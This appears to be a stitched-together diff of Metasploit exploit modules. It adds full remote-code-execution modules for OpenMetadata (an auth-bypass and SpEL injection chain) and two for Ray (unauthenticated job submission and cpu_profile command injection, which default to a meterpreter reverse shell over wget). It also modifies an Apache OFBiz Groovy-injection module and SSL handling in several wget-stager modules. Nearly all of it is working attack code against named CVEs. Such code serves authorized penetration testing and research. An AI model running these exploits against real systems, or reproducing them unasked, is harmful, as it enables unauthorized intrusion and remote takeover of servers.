    print_good("CSRF token is : #{csrf_token}")
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
    })

    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
-    return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)
+    return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless res.code == 200 || res.code == 500

    # Some cameras are not vulnerable and still respond 500. We can weed them out by making
    # the remote target sleep and use a low timeout. This might not be good for high latency targets
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
    })

    fail_with(Failure::Disconnected, 'Connection failed') unless res
-    fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 or 500: #{res.code}") unless (res.code == 200 || res.code == 500)
+    fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 or 500: #{res.code}") unless res.code == 200 || res.code == 500
  end

  def exploit
@@ -151,11 +151,6 @@ class MetasploitModule < Msf::Exploit::Remote
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
@@ -172,9 +167,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+    })

-      datastore['SSL'] = true if ssl_restore
    end

    #
@@ -304,11 +304,6 @@ class MetasploitModule < Msf::Exploit::Remote
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
@@ -325,9 +320,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+    })

-      datastore['SSL'] = true if ssl_restore
    end

    #
@@ -155,11 +155,6 @@ class MetasploitModule < Msf::Exploit::Remote
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
@@ -176,9 +171,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+    })

-      datastore['SSL'] = true if ssl_restore
    end

    #
@@ -270,11 +270,6 @@ class MetasploitModule < Msf::Exploit::Remote
    if (datastore['DOWNHOST'])
      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
    else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end

      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
@@ -291,9 +286,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+    })

-      datastore['SSL'] = true if ssl_restore
    end

    #
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenMetadata authentication bypass and SpEL injection exploit chain',
+        'Description' => %q{
+          OpenMetadata is a unified platform for discovery, observability, and governance powered
+          by a central metadata repository, in-depth lineage, and seamless team collaboration.
+          This module chains two vulnerabilities that exist in the OpenMetadata aplication.
+          The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
+          It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
+          endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
+          to make any path contain any arbitrary strings that will match the excluded endpoint condition
+          and therefore will be processed with no JWT validation allowing an attacker to bypass the
+          authentication mechanism and reach any arbitrary endpoint.
+          By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
+          at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+          are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
+          authentication.
+          OpenMetadata versions `1.2.3` and below are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor
+          'Alvaro Muñoz alias pwntester (https://github.com/pwntester)' # Original discovery
+        ],
+        'References' => [
+          ['CVE', '2024-28255'],
+          ['CVE', '2024-28254'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/'],
+          ['URL', 'https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255'],
+          ['URL', 'https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/']
+        ],
+        'DisclosureDate' => '2024-03-15',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Automatic',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'rport' => 8585,
+          'FETCH_COMMAND' => 'WGET'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMetadata web application', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # list of paths that require no authentication
+    unauthed_paths = [
+      '/api/v1;v1%2Fv1%2Fusers%2Flogin',
+      '/api/v1;v1%2Fv1%2Fusers%2Fsignup',
+      '/api/v1;v1%2Fv1%2Fusers%2FregistrationConfirmation',
+      '/api/v1;v1%2Fv1%2Fusers%2FresendRegistrationToken',
+      '/api/v1;v1%2Fv1%2Fusers%2FgeneratePasswordResetLink',
+      '/api/v1;v1%2Fv1%2Fusers%2Fpassword%2Freset',
+      '/api/v1;v1%2Fv1%2Fusers%2FcheckEmailInUse',
+      '/api/v1;v1%2Fv1%2Fusers%2Frefresh',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fconfig',
+      '/api/v1;v1%2Fv1%2Fsystem%2Fversion'
+    ]
+    # $@|sh – Getting a shell environment from Runtime.exec
+    cmd = "sh -c $@|sh . echo #{cmd}"
+    cmd_b64 = Base64.strict_encode64(cmd)
+    spel_payload = "T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(\"#{cmd_b64}\")))"
+    unauthed_paths.shuffle!.each do |path|
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, path, 'events', 'subscriptions', 'validation', 'condition', spel_payload),
+        'method' => 'GET'
+      })
+      break if res.code == 400 && res.body.include?('EL1001E')
+    end
+  end
+
+  def check
+    print_status('Trying to detect if target is running a vulnerable version of OpenMetadata.')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    return CheckCode::Unknown('Could not detect OpenMetadata.') unless res && res.code == 200 && res.body.include?('OpenMetadata')
+
+    # try to dectect version
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'api', 'v1', 'system', 'version'),
+      'method' => 'GET'
+    })
+    return CheckCode::Detected('Could not retrieve the version information.') unless res && res.code == 200
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    unless res_json.blank?
+      version = res_json['version']
+      version_number = Rex::Version.new(version.gsub(/[[:space:]]/, '')) unless version.nil?
+    end
+    return CheckCode::Detected('Could not retrieve the version information.') if version_number.nil?
+    return CheckCode::Appears("Version #{version_number}") if version_number <= Rex::Version.new('1.2.3')
+
+    CheckCode::Safe("Version #{version_number}")
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    execute_command(payload.encoded)
+  end
+end
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ray Agent Job RCE',
+        'Description' => %q{
+          RCE in Ray via the agent job submission endpoint.
+          This is intended functionality as Ray's main purpose is executing arbitrary workloads.
+          By default Ray has no authentication.
+        },
+        'Author' => [
+          'sierrabearchell',                      # Vulnerability discovery
+          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module
+          'Takahiro Yokoyama'                     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-48022'],
+          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],
+          ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/']
+        ],
+        'CmdStagerFlavor' => %i[wget],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET',
+                'MeterpreterTryToFork' => true
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8265),
+      ]
+    )
+  end
+
+  def get_job_data(cmd)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/jobs/'),
+      'data' => { 'entrypoint' => cmd }.to_json
+    })
+    unless res && res.code == 200
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'),
+        'data' => { 'entrypoint' => cmd }.to_json
+      })
+    end
+    return unless res && res.code == 200
+
+    JSON.parse(res.body)
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/version')
+    })
+    return Exploit::CheckCode::Unknown unless res && res.code == 200
+
+    ray_version = res.get_json_document['ray_version']
+
+    return Exploit::CheckCode::Unknown unless ray_version
+
+    return Exploit::CheckCode::Safe unless Rex::Version.new(ray_version) <= Rex::Version.new('2.6.3')
+
+    @job_data = get_job_data('ls')
+    return Exploit::CheckCode::Vulnerable unless @job_data.nil?
+
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    @job_data ||= get_job_data('ls')
+    if @job_data
+      print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'")
+    end
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager({ flavor: :wget })
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    get_job_data(cmd)
+  end
+
+end
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ray cpu_profile command injection',
+        'Description' => %q{
+          Ray RCE via cpu_profile command injection vulnerability.
+        },
+        'Author' => [
+          'sierrabearchell',                      # Vulnerability discovery
+          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module
+          'Takahiro Yokoyama'                     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-6019'],
+          ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],
+        ],
+        'CmdStagerFlavor' => %i[wget],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8265),
+      ]
+    )
+  end
+
+  def get_nodes
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nodes?view=summary')
+    })
+    return unless res && res.code == 200
+
+    JSON.parse(res.body)
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/version')
+    })
+    return Exploit::CheckCode::Unknown unless res && res.code == 200
+
+    ray_version = res.get_json_document['ray_version']
+
+    return Exploit::CheckCode::Unknown unless ray_version
+
+    ray_version = Rex::Version.new(ray_version)
+    return Exploit::CheckCode::Safe unless Rex::Version.new('2.2.0') <= ray_version && ray_version <= Rex::Version.new('2.6.3')
+
+    @nodes = get_nodes
+    return Exploit::CheckCode::Vulnerable unless @nodes.nil?
+
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    # We need to pass valid node info to /worker/cpu_profile for the server to process the request
+    # First we list all nodes and grab the pid and ip of the first one (could be any)
+    @nodes ||= get_nodes
+    fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes
+    first_node = @nodes['data']['summary'].first
+    fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid')
+    pid = first_node['agent']['pid']
+    fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')
+    ip = first_node['ip']
+    print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded, { pid: pid, ip: ip })
+    else
+      execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'),
+      'vars_get' => {
+        'pid' => opts[:pid],
+        'ip' => opts[:ip],
+        'duration' => 5,
+        'native' => 0,
+        'format' => "`#{cmd}`"
+      }
+    })
+  end
+
+end
@@ -252,28 +252,19 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def start_http_server
-    #
-    # HttpClient and HttpServer use same SSL variable :(
-    # We don't need SSL for payload delivery so we
-    # will disable it temporarily.
-    #
-    if datastore['SSL']
-      ssl_restore = true
-      datastore['SSL'] = false
-    end
    start_service({
      'Uri' => {
        'Proc' => proc do |cli, req|
          on_request_uri(cli, req)
        end,
        'Path' => resource_uri
-      }
+      },
+      'ssl' => false # do not use SSL
    })
    print_status("Second payload download URI is #{get_uri}")
    # We need to use instance variables since get_uri keeps using
    # the SSL setting from the datastore.
    # Once the URI is retrieved, we will restore the SSL settings within the datastore.
    @second_stage_url = get_uri
-    datastore['SSL'] = true if ssl_restore
  end
 end
@@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
        else
          found0s += 1
        end
-        power_of_2 = power_of_2 << 1
+        power_of_2 <<= 1
      end
    end
    return seed, round4_array
@@ -336,7 +336,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))
+    if (datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::')
      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
    end

@@ -112,12 +112,6 @@ class MetasploitModule < Msf::Exploit::Remote
        fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
      end

-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
-
      #we use SRVHOST as download IP for the coming wget command.
      #SRVHOST needs a real IP address of our download host
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
@@ -134,9 +128,10 @@ class MetasploitModule < Msf::Exploit::Remote
          on_request_uri(cli, req)
        },
        'Path' => resource_uri
-      }})
+      },
+      'ssl' => false # do not use SSL
+    })

-      datastore['SSL'] = true if ssl_restore
    end


@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
        },
        'License' => MSF_LICENSE,
        'Author' => [
-          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2020-11857' ],
@@ -13,11 +13,19 @@ class MetasploitModule < Msf::Exploit::Remote
    super(
      update_info(
        info,
-        'Name' => 'Apache OFBiz Forgot Password Directory Traversal',
+        'Name' => 'Apache OFBiz forgotPassword/ProgramExport RCE',
        'Description' => %q{
-          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable
-          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in
-          turn allows for remote code execution in the context of the user running the application.
+          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability (CVE-2024-32113). The
+          vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint
+          which in turn allows for remote code execution in the context of the user running the application. This was
+          patched in 18.12.14.
+
+          It was then discovered that the use of the path traversal vulnerability is not required in order to access
+          the vulnerable endpoint ProgramExport. CVE-2024-38856 was given for this Incorrect Authorization vulnerability
+          and was patched in 18.12.15.
+
+          This module was originally written the exploit CVE-2024-32113, but upon the discovery of CVE-2024-38856 the
+          module updated to not exploit the path traversal vulnerability allowing for exploitation on 18.12.14 as well.
        },
        'Author' => [
          'Mr-xn', # PoC
@@ -26,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
        'References' => [
          [ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'],
          [ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'],
-          [ 'CVE', '2024-32113']
+          [ 'CVE', '2024-32113'],
+          [ 'CVE', '2024-38856']
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w[linux win],
@@ -69,9 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def send_cmd_injection(cmd)
-    data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"
+    data = "groovyProgram=#{to_unicode_escape("throw new Exception('#{cmd}'.execute().text);")}"
    send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'),
+      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword/ProgramExport'),
      'headers' => {
        'HOST' => '127.0.0.1'
      },
@@ -84,9 +93,9 @@ class MetasploitModule < Msf::Exploit::Remote
    echo_test_string = rand_text_alpha(8..12)
    case target['Type']
    when :win_cmd
-      test_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}")
+      test_payload = "cmd.exe /c echo #{echo_test_string}"
    when :unix_cmd
-      test_payload = to_unicode_escape("echo #{echo_test_string}")
+      test_payload = "echo #{echo_test_string}"
    else
      return CheckCode::Unknown('Please select a valid target')
    end
@@ -112,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
    when :win_cmd
      res = send_cmd_injection(payload.encoded)
    when :unix_cmd
-      res = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}"))
+      res = send_cmd_injection("sh -c $@|sh . echo #{payload.raw}")
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
--- a/Show More
+++ b/Show More